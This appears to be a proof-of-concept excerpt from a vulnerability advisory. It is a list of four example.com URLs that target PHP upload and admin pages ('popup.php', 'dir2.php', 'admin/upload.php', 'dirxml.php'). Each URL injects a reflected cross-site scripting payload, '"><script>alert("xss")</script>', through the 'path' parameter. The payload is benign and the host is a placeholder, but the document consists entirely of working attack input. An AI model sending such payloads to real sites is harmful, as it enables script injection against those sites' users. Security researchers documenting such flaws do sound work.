http://www.example.com/upload/popup.php?path="><script>alert("xss")</script> http://www.example.com/upload/test/dir2.php?path="><script>alert("xss")</script> http://www.example.com/upload/admin/upload.php?path="><script>alert("xss")</script> http://www.example.com/upload/dirxml.php?path="><script>alert("xss")</script>